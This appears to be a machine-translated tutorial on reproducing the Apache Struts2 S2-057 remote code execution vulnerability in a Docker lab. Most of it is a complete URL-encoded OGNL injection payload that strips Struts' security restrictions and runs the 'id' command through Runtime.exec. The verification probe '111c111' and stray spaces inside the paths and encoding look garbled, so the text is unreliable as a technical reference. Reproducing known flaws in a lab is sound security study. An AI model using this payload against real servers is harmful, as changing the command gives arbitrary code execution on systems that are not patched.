How to reproduce remote code execution vulnerabilities in Struts2-057
This article will explain in detail how to reproduce vulnerabilities in remote code execution of Struts2-057. the content of the article is of high quality, so the editor will share it with you for reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.
Use docker to build the environment
Visit the page http://ip:8080/struts2-showcase
Second, vulnerability verification
Try visiting / struts2-showcase/$ {(111c111)} / actionChain1.action
Become / struts2-showcase/222/register2.action
Executed, indicating that there may be a struts2-057vulnerability
III. Vulnerability exploitation
Poc that executes the command
/ index/%24%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28% 29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
Execution, and get the return of id command execution (in url)
On how to carry out Struts2-057 remote code execution vulnerability reproduction is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.